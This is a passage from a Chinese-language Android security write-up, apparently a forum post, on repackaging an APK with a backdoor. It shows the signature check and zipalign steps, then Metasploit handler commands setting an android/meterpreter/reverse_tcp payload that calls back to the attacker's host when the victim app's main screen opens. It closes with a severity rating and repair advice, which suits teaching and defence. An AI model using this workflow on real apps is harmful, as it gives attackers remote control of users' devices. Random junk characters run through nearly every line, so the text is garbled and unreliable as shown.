1 T9 v; M" z+ g$ U$ [# V8 r6 b5 `$ k7 W, ^5 z apksigner verify -v --print-certs repackaged.apk 3 V; t: E* O& s% Q" h ! `9 o/ ?8 C$ @) S b

/ o& D2 B" ]$ _( t( j; W1 T ! U& Y+ H. n/ C keytool方式 1 x F2 I: O$ S$ N 4 L2 u) i3 M& e+ I2 s' y

/ E8 Y. m3 [( E4 x+ h, Z9 @) V # Z& w- R$ v8 b2 ?+ i keytool -printcert -jarfile repackaged.apk 3 g5 I: t& y0 f. n2 d* m/ g( q5 Z! R1 p1 _& o8 X/ X6 V3 y L

$ O8 Z+ V2 l6 t3 I. C S2 @5 ^! e! |; M$ y0 ` 对齐 & A+ F* y+ o4 o7 @ 7 p' A+ A% w* O5 r9 h% d1 Z

+ [" P( Q7 t# A) t * W8 ~9 ?0 K/ v! K 字节对齐优化 7 T, U' q$ _" c/ A1 F 4 _. Z) P; z2 R9 E& X% }) B, @7 j& d

7 {; d! I# K g+ i% ]/ ^6 p: o4 ~ / t9 e2 ^) c. n$ R zipalign -v 4 repackaged.apk final.apk 1 u" h9 A3 ^8 r# w {8 }- m5 S& G & \* M. }- D' H; d! N

+ D* I' R5 X+ p' d& b% ?) G! X; c" {% k7 ^$ g$ o0 k: G% l 检查是否对齐 4 b) q$ z! Y b7 }2 G 4 _7 {9 S1 ~+ A$ g, R' V# l

/ L) _7 }1 j8 q4 n, r$ p ' y5 i5 P/ q4 y5 f3 o zipalign -c -v 4 final.apk ' z3 y8 t: D6 ]5 J7 z. o2 A* t % x7 }3 ] Y; J$ T! k6 m- o

0 P7 {5 J- p9 _9 `$ R/ t * J; {% R& ?; b 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 1 I9 T, w- m: E5 _4 B % o2 P$ y* v- g, H

5 z$ b [6 g6 Z0 E: ]( z p4 z' ~% o3 N 启动Metasploit控制台，配置参数等待上线 & `7 y; ?; [* C" {' y # F1 n8 \. m% Y4 u

9 K4 a0 e, k" m. t7 U6 Z 5 T# W+ {* K% E) H/ z 在终端依次输入如下命令 ( s& n+ b/ F) w7 L& c2 E# m ) Q* H# P0 i' A9 f9 |; _# u6 G# |

9 D7 n( |! E% J9 I% _3 w1 A* U, | 7 s/ b F/ R5 a% f5 c! _" l+ e4 l msfconsole & g. [8 y5 A9 [. I; J + Q1 |' N( n, b) v6 k% p1 D

4 s6 {9 {# H, e+ `- g) v; u 0 G! I: I- k H2 o& ?2 k use exploit/multi/handler : f0 N/ }' u5 Y' D* s1 Y6 U$ `# W 6 D2 y2 g' C4 r$ p2 y. b% r x

, U9 B$ b, ^/ l 9 ~% b+ q" p( }9 M7 _% F9 m set PAYLOAD android/meterpreter/reverse_tcp / `3 y6 f; w9 w; s ; l$ M, \, _) L2 T

. K: M2 }- z: ~+ R+ _& ] 0 n' ^ q" S! Q, N6 H& x set LHOST 192.xxx.xx.xx 8 T. r& R+ A) _, N; ? ' s% N& S2 F) m# f G( w _0 v$ n+ Y

: _8 |' M$ u5 n2 `! r 1 D( p5 D2 l3 n! W9 j set LPORT 4444 ; x0 ?- S! k% g) o! {1 D! n ] . R. @5 h6 W6 ~) A T: j& N

5 g0 M+ E5 b J: O1 q2 s ) ?8 ?2 e# v/ X0 E6 o5 v exploit " ~- G* G4 v4 q 0 g/ A7 p1 r& s4 Z, |

' t" L3 d/ F* Y2 u ( Y6 N9 L* v3 C3 u; g k' a 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 3 V6 I( X; P. A7 a/ H4 M' `: U6 `

! c3 n" D/ x, N$ Q 3 c* r q1 x4 R 漏洞危害：中 $ u% w/ d( Y! N/ X/ O6 x; g9 f4 f. V) o. ?# ^+ _

+ s7 y* b9 G3 A. p4 c & n$ q; b9 d2 V" Z$ Z 2 m \6 _- ?* U- q7 \|; l* N + I( R! L3 z" k 严重程度 9 N5 Z% t( v* d# O/ _8 w& i , I1 f: P: b+ ^5 \# m, y 8 r, b1 f5 r* W3 U: i/ N. E } m / P0 h8 N: o5 P. Y	1 r5 R9 v6 L8 b& ?7 e' F h 5 V; a1 z8 S1 R8 A) X* X 5 X0 H: w! X' a/ q5 m& b+ Y) X N3 s+ v) d* `1 g 高 8 ?; L( e4 k& j7 Y2 ~2 X L2 B q/ ~5 e8 m- t# z6 F( @ ; g6 y T2 W2 q0 G6 o% U % P1 m- I) Q' L$ a. B	0 F Q" w- d8 {/ x' ] % \' K4 g2 m, H1 Y 9 X# W: M7 h6 C3 o7 u4 ~& u2 q ^ L2 q" R/ _( _) U$ T3 q ■ + R1 z. t1 u7 t3 j+ Y1 U " T$ M5 F4 J6 ]6 h3 e 8 q5 q+ W9 f+ L- \|+ S " S( S" l7 f) t	9 q# R+ u& m- Z& y( }" D$ h; F3 h8 L " B% N: F5 V! [ & Y R# U2 Z6 o* Y1 e * L) z$ T* Y* ]3 v 中 ) E9 [5 v6 B) A 3 v3 P# J8 [" p: n" Z" J: D; e2 m" x 7 j4 ^3 B- k% W: _ ; y( v8 n6 Z. Z6 G+ g9 t$ R1 B	: r8 e6 Y/ Q# ~2 m, n4 Y, E ' b2 H- x5 ]2 M ) Q) g9 O2 W4 k3 r/ u' m ( [. \|. x3 b- L , e" Z/ B# ~1 z) r2 H) P+ b B ' v( D0 ?9 Z# S1 M+ y) S! ` + i) L3 @9 k3 Y# i9 A6 C; v. j, u5 u: E$ `8 M {& S0 \1 n: l% ^( G3 e% Q: B( J/ G- U& k, j	o$ q1 s% n! x1 _ B( h 4 B/ _! Y- `8 c# h; K! k ' \|# J% C6 j# Z- c) o6 M! D 9 y/ r7 G& D# Q% L5 X7 H; v0 { 低 9 R U0 G9 w* l. x: R1 G ] + w+ Y3 m& \|2 Z- T5 r2 b+ z 8 N$ P3 v \|7 \% O ) M8 `' U. s8 w	* g. P4 T; q. p* G1 u2 W0 S- b / i* V0 n2 e6 E* W$ ]( g 6 k Q9 h4 R8 S5 O9 T7 ^" j ! d5 n* @7 k& Y- G: [' o+ w $ p1 T* N8 z5 w- p* {5 Q: n# l ! e! G8 J9 W; v {* F ) ?5 W/ R* s( c& P ! {* J: o8 c4 U+ o2 A% s ( q0 Y6 B. x2 S8 V$ `2 v2 N8 W+ d0 p : C7 D9 g% d' k( b6 ^8 l

) ^9 H0 R/ z/ u: i! d/ l 9 p6 p" {5 k* \" L* y: y+ _+ B9 i % X1 j9 Y' w( I9 Y* A. c # q# A( n7 S$ N; K, }* P

* M0 g7 B& d n 5 p0 [; w5 _# b) C" w. k 修复方法： : h4 |2 B& B1 `# I0 S+ m 4 Z9 I8 b+ S/ ~& O0 x* @( B$ W3 l' m

$ d& C7 `- X* c- d0 ~7 E / n4 N. l( G! M- k4 [, u# T 1.在 APP 启动时应做签名校验防止二次打包。
6 E/ _8 R- X u8 Z4 ^4 W" E( ]5 A 6 a) d" Z7 G; _8 G( V0 G 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 " F0 D! I( j- G) ?) [ $ M/ o& n8 J2 L F5 g' w3 C/ l# b* r

& |. B9 B7 ~' j5 ]8 T: H % j* s9 |- B [0 [8 C1 K " z) {3 S9 F `6 N7 g2 G+ Y & B: A |; ]3 \" @$ V* K/ J

* B- g* g, f3 L8 f; \* J : w% s, q c: G9 V1 s
% B1 k5 n& t) e 1 Y* `9 |+ h/ F, o/ S: i

		自动登录	找回密码
密码			立即注册